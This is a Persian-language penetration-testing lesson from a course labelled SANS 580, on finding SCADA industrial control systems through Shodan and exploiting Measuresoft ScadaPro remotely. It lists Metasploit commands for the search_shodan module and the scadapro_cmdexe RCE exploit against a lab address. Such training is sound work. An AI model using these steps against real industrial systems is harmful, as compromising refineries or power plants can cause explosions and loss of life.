قسمت بیست و یکم دوره آموزشی SANS 580
مدرس: امیرحسین تنگسیری نژاد
رزومه مدرس:
https://profile.ir/amirhoseintangsirinet/about
SCADA
در این بخش درباره نحوه رخنه امنیتی در سیستم های SCADA صحبت خواهیم کرد.
اصلا بیایید ببینیم SCADA چیست؟!
مخفف Supervisory Control And Data Acquisition می باشد که به فارسی به این گونه خوانده می شود: "سامانه سرپرستی و گردآوری داده" یا همان SCADA( اسکادا ) یک سیستم کنترلی به منظور ارتباط داده ایی و گرافیکی با سیستم های یک شبکه تا فرایند مدیریتی را نظارت کند
این سیستم ها از ارزش بالایی برخوردار هستند و در هرجایی مورد استفاده قرار نمی گیرند
معمولا در پالایشگاه های نفت، سکو های گازی و نفتی، نیروگاه های برق و جاهای که از اهمیت بالا برخوردار هستند
فریمورک ها و اکسپلویت های مختلفی به منظور انجام تست نفوذ بر روی این سیستم ها وجود دارد و حتی روش های دیگری که مانند داشتن UserName و Password های Default که توسط افراد عوض نشده اند نیز وجود دارد ولی تاحدی یک امکان است. تست نفوذ سیستم های صنعتی SCADA خودش یک بحث کامل به حساب می آید که در این دوره جای زیادی ندارد.
تست نفوذ به این سیستم ها کار بسیار مهم و پرخطری می باشد فرد مهاجم درصورت نفوذ حتی می تواند موجب انفجار یک شهر و یا منطقه شود و تلفات جانی زیادی به بار بیاورد
به منظور کشف این سیستم ها ما میتوانیم از موتور جست و جوی قدرتمند Shodan استفاده کنیم
به قول معروف وحشتناک ترین موتور جست و جوی اینترنت
shodan.io
همانطور که در تصویر میبینید تعداد زیادی سرور هایی را برای ما نمایش می دهد توسط سرور های Rockwell اجرا می شوند
علاوه بر Shodon در متااسپلویت یک ماژول به منظور اینکار وجود دارد که نیاز به یک API Key از Shodon دارد. این ماژول در مسیر زیر می باشد:
use auxiliary/gather/search_shodan
خب برای تست نفوذ فرض می کنیم ما در یک سیستم عامل ویندوز XP یک سیستم Measuresoft's SCADAPro نصب است ما استفاده از ماژول cmdexe_scadapro توانایی بکارگیری و اجرای کد های خود از راه دور را داریم درواقع به کار گیری آسیب پذیری RCE یا همان Remote Code Execution
use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.43.121
exploit
وبسایت زیر
https://scadahacker.com
لیستی از آسیب پذیری های
گوناگون یافت شده در سیستم های صنعتی SCADA را به شما نشان یم دهد. زیبایی
این لیست از این واقعیت گرفته شده است که اطلاعات دقیق را درباره محصولات
مختلف SCADA به شما نشان نیز می دهد که بسیار کارآمد می باشند علاوه بر آسیب پذیری مقالات و کتاب های مختلف و کار آمدی در زمینه تست نفوذ و امنیت سایبری نیز دارد که قطعا خوشتان می آید